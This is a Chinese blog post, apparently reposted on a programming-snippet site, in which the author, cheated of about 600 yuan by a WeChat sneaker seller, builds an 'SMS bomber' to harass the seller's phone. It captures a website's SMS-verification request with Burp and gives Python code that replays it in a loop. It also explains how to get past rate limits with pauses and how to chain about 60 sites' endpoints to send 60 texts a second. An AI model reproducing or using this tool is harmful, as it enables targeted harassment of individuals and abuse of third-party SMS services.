骗子居然敢骗我的钱!看我不用Python短信轰炸死他!老实把钱还我

骗子居然敢骗我的钱!看我不用Python短信轰炸死他!老实把钱还我,第1张

概述最近微信上突然有好友加我!我以为是认识的同事或者朋友什么的,就同意了,加了之后发现确实不认识她,还是还聊的很开吧!就慢慢的降低了自己的防备心理!聊一些生活的琐事家常,不得不说,这个销售人员做的很好,估

最近微信上突然有好友加我!我以为是认识的同事或者朋友什么的,就同意了,加了之后发现确实不认识她,还是还聊的很开吧!就慢慢的降低了自己的防备心理!聊一些生活的琐事家常,不得不说,这个销售人员做的很好,估计是个老销售了!

有聊到一些穿衣啊穿鞋等这上面,然后这个人就和我一直聊品牌啥的,问我最喜欢穿啥鞋子等!我也就直话直说,然后聊来聊去她就说她一个堂哥还是啥的,是那个品牌的区域经理,找他拿鞋子要便宜了一半。然后我就抱着玩玩的心态就找她了解了一下,虽然我本人不喜欢穿AJ啊,但是这鞋子现在很火嘛,所以就刻意问了一下,她想都没想就说只需要600左右,看几代才能决定价格,这不我弟弟还在学校读书嘛。也想穿AJ,我也就想给他买一双,大不了就当是在拼多多上面买了一双嘛,到晚上我就给她转账了六百多,地址电话啥都给给她了,第二天起来问她有没有搞定,没想到我看到了一个红色感叹号,这就很令人气氛了,居然敢坑我!

由于当时没想这么多,所以具体微信也没有截图,就记得电话号码。然后我就写了一个短信轰炸,她不把钱还给我,我是不会停止的,一秒钟可是六十条,还是很恐怖的~!好了接下来就是重点了。看我是如何写出这个轰炸机的!小编温馨提示:不可用于非法用途,后果自负!

首先

这是一个网站,他的业务存在短信发送

这个时候,我们打开神器burp或者其他抓包工具(最好用burp,因为repeater模块可以满足我们的需要)

这时候我给我的火狐挂上代理,然后burp开启拦截

{"mobile":"13xxxxxx","type":"signup"}

这个是发送的数据,go走起

看返回的包可以看到是成功的

import requestsimport Jsonheaders = {'User-Agent' : 'Mozilla/5.0 (windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 firefox/56.0','cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'}#data =#print datar = requests.post('/cAPI/v1/dmhome/send_token',data=Json.dumps({"mobile":"手机号码","type":"signup"}),headers=headers)

print(r.text)

先进行测试,测试完成后可以for循环加强脚本的威力,经过我的研究发现当一个号码多次提交后会被ban,如我一次性发了10个包后(也就是发了十条短信)之后的这个号码就不会再发了,即使返回的包状态是成功,但是短信是发不到的,其实我们可以停顿十秒再发下一个,这样就不会被ban,这也是测试知道的

好了,今天我就说道这吧,可能大家会说就一个号码我直接加入黑名单就ok了,的确,但是我们可以挖掘这类型的网站,然后一个一个接口发送一次,60个接口,一秒钟就60条短信,威力还是可以的,附上成功的图片

是不是很简单啊!切记不能商用,不能侵犯他人权益哦!源码自己下载哈!

总结

以上是内存溢出为你收集整理的骗子居然敢骗我的钱!看我不用Python短信轰炸死他!老实把钱还我全部内容,希望文章能够帮你解决骗子居然敢骗我的钱!看我不用Python短信轰炸死他!老实把钱还我所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1208699.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-04
下一篇 2022-06-04

发表评论

登录后才能评论

评论列表(0条)

保存